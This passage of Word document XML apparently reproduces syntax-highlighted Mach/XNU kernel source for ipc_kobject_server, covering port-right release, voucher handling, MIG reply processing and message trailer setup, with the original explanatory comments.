          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"ipc_kobject_server: bogus kernel message, id=%d\n"</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id</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color w:val="008000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#endif</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* MACH_IPC_TEST */</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>            </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_MIG_MSGID_INVALID</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id</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sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mig_reply_erro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RetCode</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BAD_ID</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lastRenderedPageBreak/>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br/>
        <w:t>          </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kernel_task</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>messages_received</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kernel_task</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>messages_sen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Destroy destination. The following code differs from</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>     *  ipc_object_destroy in that we release the send-once</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>     *  right instead of generating a send-once notification</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>     *  (which would bring us here again, creating a loop).</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>     *  It also differs in that we only expect send or</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>     *  send-once rights, never receive rights.</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>     *</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>     *  We set msgh_remote_port to IP_NULL so that the kmsg</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>     *  destroy routines don't try to destroy the port twice.</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sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>destp</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ipc_port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amp;</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remote_por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switch</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ACH_MSGH_BITS_REMOTE</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bits</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case</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MACH_MSG_TYPE_PORT_SEND</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port_release_send</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(*</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>destp</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break</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case</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MACH_MSG_TYPE_PORT_SEND_ONCE</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port_release_sonce</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(*</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>destp</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break</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defaul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panic</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"ipc_kobject_server: strange destination rights"</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sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>destp</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P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Destroy voucher.  The kernel MIG servers never take ownership</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>     *  of vouchers sent in messages.  Swallow any such rights here.</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IP_VALID</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voucher</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assert</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MACH_MSG_TYPE_PORT_SEND</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MACH_MSGH_BITS_VOUCHER</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bits</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port_release_send</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voucher</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vouche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IP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bits</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MACH_MSGH_BITS_COMPLEX</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amp;&amp;</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lastRenderedPageBreak/>
        <w:t>           </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>((</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mig_reply_erro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RetCod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KERN_SUCCESS</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k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ig_reply_erro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RetCode</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br/>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>k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KERN_SUCCESS</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k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KERN_SUCCESS</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k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NO_REPLY</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The server function is responsible for the contents</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>         *  of the message.  The reply port right is moved</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>         *  to the reply message, and we have deallocated</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>         *  the destination port right, so we just need</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>         *  to free the kmsg.</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sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ipc_kmsg_free</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The message contents of the request are intact.</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>         *  Destroy everthing except the reply port right,</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>         *  which is needed in the reply message.</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t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>request</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local_por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CH_PORT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ipc_kmsg_destroy</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>request</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k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IG_NO_REPLY</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The server function will send a reply message</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>         *  using the reply port right, which it has saved.</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sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ipc_kmsg_free</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turn</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IKM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else</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if</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IP_VALID</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>((</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ipc_port_t</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remote_port</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>         *  Can't queue the reply message if the destination</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>         *  (the reply port) isn't valid.</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>         */</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sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ipc_kmsg_destroy</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turn</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IKM_NULL</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lastRenderedPageBreak/>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>traile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sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mach_msg_format_0_trailer_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b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>((</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vm_offset_t</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b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>reply</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ikm_header</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msgh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sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>trailer</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msgh_sender</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KERNEL_SECURITY_TOKEN</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trailer</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msgh_trailer_typ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CH_MSG_TRAILER_FORMAT_0</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>trailer</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msgh_trailer_size</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MACH_MSG_TRAILER_MINIMUM_SIZE</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color w:val="808080"/>
